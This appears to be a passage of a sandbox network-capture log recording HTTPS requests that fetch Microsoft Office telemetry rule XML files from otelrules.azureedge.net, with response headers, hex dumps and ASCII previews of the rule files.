                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            133192.168.2.43740613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                            x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120248Z-16547b76f7fmbrhqhC1DFWkds80000000ks0000000000wmw
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            134192.168.2.43279113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                            x-ms-request-id: 4f011ac6-601e-0097-0d3d-36f33a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120248Z-r178fb8d765bflfthC1DFWuy9n00000002q0000000000m88
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L2_T2
                                                                                                                                                                                                                                            X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            135192.168.2.44975913.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                            x-ms-request-id: 50ec610d-601e-0070-10a1-34a0c9000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120248Z-1749fc9bdbd9f5rdhC1DFWbers00000002h0000000009q0f
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            136192.168.2.42793413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                            x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120248Z-16547b76f7fp6mhthC1DFWrggn0000000kkg00000000gegh
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            137192.168.2.45709113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                            x-ms-request-id: d8b0f8ac-001e-005a-47a7-34c3d0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120249Z-r178fb8d7656shmjhC1DFWu5kw00000002eg00000000at6q
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            138192.168.2.44671013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                            x-ms-request-id: 9564d138-601e-0084-5287-366b3f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120250Z-r178fb8d765z89v7hC1DFW0kvw00000002f00000000005pb
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            139192.168.2.44977613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                            x-ms-request-id: f826ff35-b01e-00ab-80a6-34dafd000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120250Z-1749fc9bdbd85qw2hC1DFW157000000002p0000000003dr2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            140192.168.2.44977513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                            x-ms-request-id: 09d23618-001e-000b-0deb-2b15a7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120250Z-16547b76f7fcjqqhhC1DFWrrrc0000000kgg00000000bqfd
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            141192.168.2.44977813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                            x-ms-request-id: 31f85cd6-001e-0049-0b4a-325bd5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120250Z-16547b76f7flf9g6hC1DFWmcx8000000090g00000000gftq
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:50 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
